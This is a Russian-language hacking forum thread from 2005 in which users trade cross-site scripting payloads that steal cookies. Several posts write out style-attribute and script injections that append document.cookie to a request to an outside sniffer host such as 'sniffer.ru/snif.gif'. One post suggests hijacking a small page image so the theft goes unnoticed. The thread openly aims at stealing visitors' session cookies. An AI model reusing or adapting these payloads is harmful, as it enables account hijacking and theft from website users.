23.06.2005, 19:33
|
|
Новичок
Регистрация: 23.06.2005
Сообщений: 28
С нами:
10990066
Репутация:
0
|
|
xss в стилях
вот как реализовать такое:
нужно не выходя из тега, к примеру: <img ......>
передать нужному скрипту кукисы.
т.е. http://example/?document.cookie
!И НЕ ОТКРЫВАТЬ НОВОЕ ОКНО! |
|
|
23.06.2005, 19:44
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
С нами:
11042306
Репутация:
2726
|
|
<img src="http://example/?"+document.cookie>
если ты имеешь ввиду не выходя за кавычку, то так не получится
|
|
|
|
23.06.2005, 20:21
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами:
11156006
Репутация:
749
|
|
Сообщение от KEZ
<img src="http://example/?"+document.cookie>
если ты имеешь ввиду не выходя за кавычку, то так не получится
KEZ, ты ничего не путаешь?
|
|
|
|
23.06.2005, 19:54
|
|
Новичок
Регистрация: 23.06.2005
Сообщений: 28
С нами:
10990066
Репутация:
0
|
|
не... в стилях
style="здеся"
я имею введу за '>'
|
|
|
|
23.06.2005, 20:25
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами:
11156006
Репутация:
749
|
|
Сообщение от xPow
не... в стилях
style="здеся"
я имею введу за '>'
<img src="http://sasa" style="background:black url(javascript :document.images[0].src='http://sniffer.ru/snif.gif?'+document.cookie)">
В этом случае самая первая картинка изуродуеется в снифер. Обойти так:
1)либо написать скриптик, котрый создаст новую картинку
2)либо сниффер сделать ввиде той картинки, которая заменится
3)либо выбрать просто не [0] а какуюнить маленькую картинку в теле документа, пропажи/подмены которой не заметно.
Последний раз редактировалось Zadoxlik; 23.06.2005 в 20:28..
|
|
|
|
23.06.2005, 20:37
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
С нами:
11042306
Репутация:
2726
|
|
конечно путаю, я заголовок не прочитал
style=background:url(javascript:i=new Image();i.src='http://example/?'+document.cookie)
можно как Zadoxlik сказал, но не факт что на странице будет images[0]
|
|
|
|
23.06.2005, 20:56
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами:
11893346
Репутация:
45
|
|
Аналогичная тема:
http://forum.antichat.ru/showthread.php?t=6829
Ссылка по теме:
http://antichat.ru/crackchat/HTML
Сообщение от KEZ
можно как Zadoxlik сказал, но не факт что на странице будет images[0]
Тогда на странице вообще не будет изображений, т.к. первое изображение в хтмл-документе получает 0... А смысл, который подразумевал задохлик как раз в динамической подмене изображения (с помощью скриптовой инъекции)...
Последний раз редактировалось Че Гевара; 23.06.2005 в 21:05..
|
|
|
|
23.06.2005, 20:59
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами:
11156006
Репутация:
749
|
|
Kez, я имел ввиду, то что, не кажется ли тебе что твой вариант вообще не сработает?
ЗЫ: изображение палюбэ будет, т.к. мы прописываем энто все в теге имг. Даже если б не было (скажем тег был бы не имг), я написал как пример, что в этом же коде, можно создать изображение.
Последний раз редактировалось Zadoxlik; 23.06.2005 в 21:12..
|
|
|
|
23.06.2005, 21:08
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
С нами:
11042306
Репутация:
2726
|
|
кажется
фишка в том что я вообще не въехал про что тут тема...
извините за тупые ответы
|
|
|
|
23.06.2005, 21:24
|
|
Новичок
Регистрация: 23.06.2005
Сообщений: 28
С нами:
10990066
Репутация:
0
|
|
это не работает
style=background:url(javascript:i=new Image();i.src='http://example/?'+document.cookie)
наверное в стилях нельзя так. потому как
<script>i = new Image(); i.src = "http://example/?"+document.cookie;</script>
работает на ура
и еще... больше надо в теге <font style=...>
нежели в <img ....> :-\ |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
